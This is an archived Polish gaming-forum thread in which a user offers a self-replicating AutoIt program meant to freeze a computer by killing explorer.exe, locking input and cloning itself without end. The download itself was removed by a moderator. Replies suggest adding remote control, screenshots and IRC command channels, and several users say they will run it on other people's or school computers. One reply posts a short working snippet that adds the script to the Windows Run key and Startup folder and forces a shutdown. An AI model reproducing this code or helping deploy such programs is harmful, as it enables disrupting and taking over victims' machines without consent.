Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[DL] Mój szkodnik, czyli syf jakich mało :D

Phoenix_PL

Rekomendowane odpowiedzi

Opublikowano

Witajcie :D

Wielu ludzi robi szkodniki. Nawet ładne. Uznałem że czas udostępnić mojego :>

Na tyle szkodników co widziałem, mój jest o tyle dobry że powstrzymanie go bez wyłączenia komputera graniczy z cudem :D

A nawet jak ten komputer wyłączymy to już będzie za późno, bo skrypt się duplikuje wszędzie gdzie się da i odpala ile wlezie :P

Prosta zasada. Pierwszy skrypt instaluje dwa dodatkowe, wyłącza explorer.exe i blokuje klawiaturę i mysz. Przy okazji już klonuje szkodniki.

Drugi skrypt wyświetla msgboxy z informacjami. Informacje to losowo generowane znaki, tak jak i nazwy klonujących się w międzyczasie szkodników. Przy okazji przy każdym uruchomieniu tego skryptu kopiuje i uruchamia się dodatkowy tworząc niekończącą się reakcję łańcuchową. No i po każdej próbie kliknięcia w msgbox program się jeszcze raz kopiuje.

Trzeci skrypt to maszyna do klonowania. Klonuje drugi skrypt i siebie a następnie odpala.

Policzcie to sobie. Skrypty kopiują się do 11 miejsc (z makr, miejsca wybierane losowo)

[ZAWARTOŚĆ USUNIĘTA PRZEZ MODERATORA]

846331404756772371599.jpeg
Opublikowano

" skrypt się duplikuje wszędzie gdzie się da i odpala ile wlezie"

Jak dla mnie marnotrawstwo pamięci dysku i procesora, wiem ,że to robal i o to chodzi ale nie lepiej stworzyc cos bardziej ambitnego niz skrypt z dircopy() [czy jakos tak] ?

Cos na ksztalt tego ze robi screeny, blokuje strony, pozwala na zdalne sterowanie , zmienia html stron na ktore wchodzi tak aby bylo cos innego itp ...

Takie zawalenie komputera i procesora nowymi zdarzeniami to nic ciekawego i kazdy po paru godzinach nauki autoit by zrobil takie cos.

PS: a skan i tak musi byc chyba ;p

Opublikowano

@UP

od tego sa tak zwane "RAT" + jest taki ze ludzi idzie bardzo łatwo nabrać na virusa :)

A tak ogl dzięki za skrypt później będę każdemu to odpalać na kompie ^^ a i pytanie czy ten program jest wykrywalny jako virus ?

@down to spróbuj

Opublikowano

@up

Niestety tak, jak zresztą 99% programów w AutoIT.

Aczkolwiek.... mogę spróbować jednej rzeczy.

//@wojtek:

W jakim celu ma robić ssy?

Pozwalanie na zdalne sterowanie - da się. Tyle że komputer musi być w jakiejś sieci hamachi lub mieć zew. IP żeby to jakoś płynnie się odbywało.

Zmiana HTML stron musiałaby polegać na grzebaniu w pamięci przeglądarki internetowej. Trudne do zrobienia. Nie mówię że niemożliwe.

Jak znajdę czas to pokombinuję nad tym, narazie zajmuję się innym projektem który niedługo też znajdzie się na MPC w tym dziale :D

//skan się robi, niech będzie :D

846331404756772371599.jpeg
Opublikowano

Zmiana HTML stron musiałaby polegać na grzebaniu w pamięci przeglądarki internetowej. Trudne do zrobienia. Nie mówię że niemożliwe.

Nie musiałaby.

Poczta, WinHTTP, FTP. Można sterować drugim komputerem, chyba, że ty chcesz pulpit zdalny.

IRC jest bardziej przyjazny przy takich zastosowaniach.

mjut.png
  • 1 miesiąc temu...
Opublikowano

Użyje w szkole na kompach biggrin.png

Thx leci like. Dam ci za 2 dni rezultat.

Nie napisał, bo nie ma na czym... smile.png
  • 2 tygodnie później...
Opublikowano

Jak można kliknąć w MsgBox mając zablokowaną klawiaturę i myszkę...

Opublikowano

Przetestuje jak będę robił reinstal windowsa :rolleyes: .

joker%20sygnatura.jpg

Moje Wideo poradniki :

http://www.youtube.com/watch?v=GxIE_-D48Mo&feature=plcp

http://www.youtube.com/watch?v=STxO41rFQus&feature=channel&list=UL

Opublikowano

No i po każdej próbie kliknięcia w msgbox program się jeszcze raz kopiuje.

Jak można kliknąć w MsgBox mając zablokowaną klawiaturę i myszkę...

O to chodzi że nie można...

To jak się ma kopiować?!

• 1 miesiąc temu...
Opublikowano

download nie działa ;d dopiero zaczynam zabawe z programowaniem wiec mogl by mi ktos powiedziec jak to dokladnie dziala tzn jak połaczyc te skrypty i wgl

Opublikowano

Dlaczego po uruchomieniu miałby się komp już nie włączyć?

Nie widzę tu niczego co kopiowałoby coś do Autostartu albo robiło wpis do rejestru.

A poza tym zawsze można odpalić Linux'a / zalogować się na innym użytkownika.

Opublikowano

Na tyle szkodników co widziałem, mój jest o tyle dobry że powstrzymanie go bez wyłączenia komputera graniczy z cudem :D

A nawet jak ten komputer wyłączymy to już będzie za późno, bo skrypt się duplikuje wszędzie gdzie się da i odpala ile wlezie :P

Jak wyłączymy to będzie za późno... Jak wyłączymy to i wirus się wyłączy! I już nie odpali.

Opublikowano

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",@ScriptFullPath)
Shutdown(1)
FileCopy(@ScriptFullPath,@ProgramsDir&'\Autostart\',1)
Shutdown(1)

• 3 tygodnie później...
Opublikowano

Jak wyłączymy to będzie za późno... Jak wyłączymy to i wirus się wyłączy! I już nie odpali.

@up przecież pisałem... możesz se odpalać bez żadnych konsekwencji...

(rzecz jasna tylko ten jego)

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...